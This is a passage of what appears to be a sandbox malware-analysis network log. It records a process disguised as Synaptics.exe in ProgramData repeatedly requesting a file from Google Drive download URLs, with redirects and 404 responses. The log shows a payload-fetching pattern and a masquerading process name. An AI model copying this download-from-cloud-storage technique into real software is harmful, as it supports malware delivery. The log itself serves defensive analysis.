                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:24 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6pTz7_MLMcLZK6PSRD0oDQjbhRC1HbAnijRFNAp-meyCWeqEuZ2t-GRn_KmU9jupXA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-4OSBAfeO74D_gU4nrxBmNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:24 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 09:58:24 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Y4rBQ9fpvtwrrlIGQO8m4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 09:58:24 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 59847 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:24 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4Yyo7t_mivK2xbUUjs9OEev3EW2eaRiD1qP-QNNAA_yRFAutez8eqa0PXQX5A1I5MR
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:24 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-tYz4_gViYQR-hThAo-hO7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 09:58:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="yZeTazalSRioqlyMCsnWWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 09:58:25 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 59853 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:25 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-k6hBPekMGB9Wu60CoSwrqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 59855 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:25 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6zdLmaJDrqe4Lny51vZ7uYhNkt3qqf5UbP1eNJfuITUTLHJne6mglvD33LBi77BhoO
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:25 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-1Z9lp4RMkz4ZzILtbiW42Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 09:58:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Mm4MfZy7x49p1LYFo-f5iQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 09:58:25 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.7 | 59854 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:25 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-B6JbDJvCde8WI1qyFyDrgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 59860 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:25 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:26 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6HBJx5c5y2cII9vOEVh2ZkPWHXDQHkaD2M43jUy8si6gxWEYhptGBC91O9Jq8JSKZB
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-20Up88Qz9RebNg4aCshwgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:26 UTC  147  IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:26 UTC  1390  IN
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="mwa7I3mqtqyMVwwdeKq19Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:26 UTC  115  IN
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                57  192.168.2.7  59866  216.58.206.46  443  7412  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-12-30 09:58:26 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-A8gxiCz3vkuJNavDXq5YAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                58  192.168.2.7  59867  216.58.206.46  443  7412  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-12-30 09:58:26 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-FIuA5t9C9OrHpgLj7zab_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                59  192.168.2.7  59868  142.250.181.225  443  7412  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-12-30 09:58:26 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:26 UTC  1250  IN  HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4K3LrapuNXSSyTEsokEvIZ9CPckEYgW54fjyxpp_kwXN7gFp2uMuz3rCp-fRcNF8-kkEuBD7k
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-anoBirZ90kCUANZmbJm-fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:26 UTC  140  IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:26 UTC  1390  IN
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="jOFEAt-PyJDvSNQ02eE5Cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:26 UTC  122  IN
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                60  192.168.2.7  59872  142.250.181.225  443  7412  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-12-30 09:58:26 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:27 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6EQYHYMUZBKYpyCKfeosMOww0EZI28RzcqalhVFwrPzwI5R6WnfuaaH7vDzbbD7-0U
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-39x7-JdhmhN0Zs_9_Eu3ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:27 UTC  147  IN
